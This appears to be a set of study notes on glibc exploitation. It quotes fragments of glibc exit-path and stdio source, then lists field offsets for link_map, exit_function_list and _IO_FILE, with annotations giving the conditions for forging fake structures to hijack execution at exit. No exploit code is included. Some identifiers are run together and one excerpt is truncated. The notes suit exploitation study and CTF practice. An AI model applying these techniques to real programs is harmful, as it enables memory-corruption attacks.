/* Caller must ensure that we know tc_idx is valid and there's room for more chunks. */ static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will detect a double free. */ e->key = tcache;
/* Call all functions registered with `atexit' and `on_exit', in the reverse of the order in which they were registered perform stdio cleanup, and terminate program execution with STATUS. */ void attribute_hidden __run_exit_handlers (int status, struct exit_function_list **listp, bool run_list_atexit, bool run_dtors) { /* First, call the TLS destructors. */ #ifndef SHARED if (&__call_tls_dtors != NULL) #endif if (run_dtors) __call_tls_dtors ();
/* We do it this way to handle recursive calls to exit () made by the functions registered with `atexit' and `on_exit'. We call everyone on the list and use the status value in the last exit (). */ while (true) { structexit_function_list *cur;
__libc_lock_lock (__exit_funcs_lock);
restart: cur = *listp;
if (cur == NULL) { /* Exit processing complete. We will not allow any more atexit/on_exit registrations. */ __exit_funcs_done = true; __libc_lock_unlock (__exit_funcs_lock); break; }
/* Unlock the list while we call a foreign function. */ __libc_lock_unlock (__exit_funcs_lock); switch (f->flavor) { void (*atfct) (void); void (*onfct) (int status, void *arg); void (*cxafct) (void *arg, int status);
case ef_free: case ef_us: break; case ef_on: onfct = f->func.on.fn; #ifdef PTR_DEMANGLE PTR_DEMANGLE (onfct); #endif onfct (status, f->func.on.arg); break; case ef_at: atfct = f->func.at; #ifdef PTR_DEMANGLE PTR_DEMANGLE (atfct); #endif atfct (); break; case ef_cxa: /* To avoid dlclose/exit race calling cxafct twice (BZ 22180), we must mark this function as ef_free. */ f->flavor = ef_free; cxafct = f->func.cxa.fn; #ifdef PTR_DEMANGLE PTR_DEMANGLE (cxafct); #endif cxafct (f->func.cxa.arg, status); break; } /* Re-lock again before looking at global state. */ __libc_lock_lock (__exit_funcs_lock);
if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called)) /* The last exit function, or another thread, has registered more exit functions. Start the loop over. */ goto restart; }
*listp = cur->next; if (*listp != NULL) /* Don't free the last element in the chain, this is the statically allocate element. */ free (cur);
__libc_lock_unlock (__exit_funcs_lock); }
if (run_list_atexit) RUN_HOOK (__libc_atexit, ());
int _IO_cleanup (void) { /* We do *not* want locking. Some threads might use streams but that is their problem, we flush them underneath them. */ int result = _IO_flush_all_lockp (0);
/* We currently don't have a reliable mechanism for making sure that C++ static destructors are executed in the correct order. So it is possible that other static destructors might want to write to cout - and they're supposed to be able to do so. The following will make the standard streambufs be unbuffered, which forces any output from late destructors to be written out. */ _IO_unbuffer_all ();
int flush_only = c == EOF; ... pos = fp->_IO_write_ptr - fp->_IO_write_base; if (pos >= (size_t) (_IO_blen (fp) + flush_only)) { if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */ return EOF; else { ... // need to be here } }
structexit_function { /* `flavour' should be of type of the `enum' above but since we need this element in an atomic operation we have to use `long int'. */ longint flavor; union { void (*at) (void); struct { void (*fn) (int status, void *arg); void *arg; } on; struct { void (*fn) (void *arg, int status); void *arg; void *dso_handle; } cxa; } func; };
/* Call the destructors. This is called either when a thread returns from the initial function or when the process exits via the exit function. */ void __call_tls_dtors (void) { while (tls_dtor_list) { structdtor_list *cur = tls_dtor_list; dtor_func func = cur->func; #ifdef PTR_DEMANGLE PTR_DEMANGLE (func); #endif
/* Ensure that the MAP dereference happens before l_tls_dtor_count decrement. That way, we protect this access from a potential DSO unload in _dl_close_worker, which happens when l_tls_dtor_count is 0. See CONCURRENCY NOTES for more detail. */ atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1); free (cur); } } libc_hidden_def (__call_tls_dtors)
for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns) { /* Protect against concurrent loads and unloads. */ __rtld_lock_lock_recursive (GL(dl_load_lock));
unsignedint nloaded = GL(dl_ns)[ns]._ns_nloaded; /* No need to do anything for empty namespaces or those used for auditing DSOs. */ if (nloaded == 0 #ifdef SHARED || GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit #endif ) __rtld_lock_unlock_recursive (GL(dl_load_lock)); else { /* Now we can allocate an array to hold all the pointers and copy the pointers in. */ struct link_map *maps[nloaded];
unsignedint i; structlink_map *l; assert (nloaded != 0 || GL(dl_ns)[ns]._ns_loaded == NULL); for (l = GL(dl_ns)[ns]._ns_loaded, i = 0; l != NULL; l = l->l_next) /* Do not handle ld.so in secondary namespaces. */ if (l == l->l_real) { assert (i < nloaded);
maps[i] = l; l->l_idx = i; ++i;
/* Bump l_direct_opencount of all objects so that they are not dlclose()ed from underneath us. */ ++l->l_direct_opencount; } ...
_rtld_global->_dl_ns[0]->_ns_loaded: (link map) offset member 0x0 l_addr (point to program base by default) 0x10 l_next (point to next link map, the length of the linked list should be 4) 0x20 l_real (point to itself) 0x110 l_info[0x1A] ( point to fini_array Elf64_Dyn structure: typedef struct { Elf64_Sxword d_tag; /* Dynamic entry type */ union { Elf64_Xword d_val; /* Integer value */ Elf64_Addr d_ptr; /* Address value */ // l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array } d_un; } Elf64_Dyn;) ) 0x120 l_info[0x1C] (point to fini_array_size Elf64_Dyn structure) // l_info[0x1C]->d_un.d_val = sizeof(fini_array) 0x31C l_init_called (should be no zero)
''' _exit_funcs (struct exit_functions_list **): struct exit_function_list { struct exit_function_list *next; size_t idx; struct exit_function fns[32]; }; struct exit_function { /* `flavour' should be of type of the `enum' above but since we need this element in an atomic operation we have to use `long int'. */ long int flavor; union { void (*at) (void); struct { void (*fn) (int status, void *arg); void *arg; } on; struct { void (*fn) (void *arg, int status); void *arg; void *dso_handle; } cxa; } func; }; '''
''' _rtld_global->_dl_ns[0]->_ns_loaded: (link map) offset member 0x0 l_addr (point to program base by default) 0x18 l_next (point to next link map, the length of the linked list should be no smaller than 4, and the tial nodes's l_next = 0) 0x20 l_prev (point to previous link map, head node's l_prev = 0) 0x110 l_info[0x1A] ( point to fini_array Elf64_Dyn structure: typedef struct { Elf64_Sxword d_tag; /* Dynamic entry type */ union { Elf64_Xword d_val; /* Integer value */ Elf64_Addr d_ptr; /* Address value */ // l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array } d_un; } Elf64_Dyn;) ) 0x120 l_info[0x1C] (point to fini_array_size Elf64_Dyn structure) // l_info[0x1C]->d_un.d_val= sizeof(fini_array) '''
''' struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ 0x10 /* The following pointers correspond to the C++ streambuf protocol. */ char *_IO_read_ptr; /* Current read pointer */ 0x18 char *_IO_read_end; /* End of get area. */ 0x20 char *_IO_read_base; /* Start of putback+get area. */ 0x28 char *_IO_write_base; /* Start of put area. */ 0x30 char *_IO_write_ptr; /* Current put pointer. */ 0x38 char *_IO_write_end; /* End of put area. */ 0x40 char *_IO_buf_base; /* Start of reserve area. */ 0x48 char *_IO_buf_end; /* End of reserve area. */ 0x50 /* The following fields are used to support backing up and undo. */ char *_IO_save_base; /* Pointer to start of non-current get area. */ 0x58 char *_IO_backup_base; /* Pointer to first valid character of backup area */ 0x60 char *_IO_save_end; /* Pointer to end of non-current get area. */ 0x68 struct _IO_marker *_markers; 0x70 struct _IO_FILE *_chain; 0x78 int _fileno; 0x80 int _flags2; 0x84 __off_t _old_offset; /* This used to be _offset but it's too small. */ /* 1+column number of pbase(); 0 is unknown. */ unsigned short _cur_column; signed char _vtable_offset; char _shortbuf[1]; _IO_lock_t *_lock; #ifdef _IO_USE_OLD_IO_FILE }; '''